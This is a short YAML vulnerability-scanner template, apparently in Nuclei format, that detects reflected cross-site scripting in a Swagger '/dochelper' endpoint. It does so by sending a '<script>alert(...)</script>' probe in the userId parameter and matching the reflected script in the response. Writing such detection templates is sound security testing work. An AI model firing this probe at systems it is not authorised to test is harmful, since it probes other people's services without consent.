id: swagger-xss

info:
  name: Swagger API XSS
  author: geeknik
  severity: medium
  reference: https://twitter.com/A0x017/status/1371122293921964032
  tags: swagger,xss

requests:
  - method: GET
    path:
      - "{{BaseURL}}/dochelper?userId=<script>alert({{randstr}})</script>"

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "text/html"
      - type: word
        part: body
        words:
          - "<script>alert({{randstr}})</script>"
      - type: status
        status:
          - 200
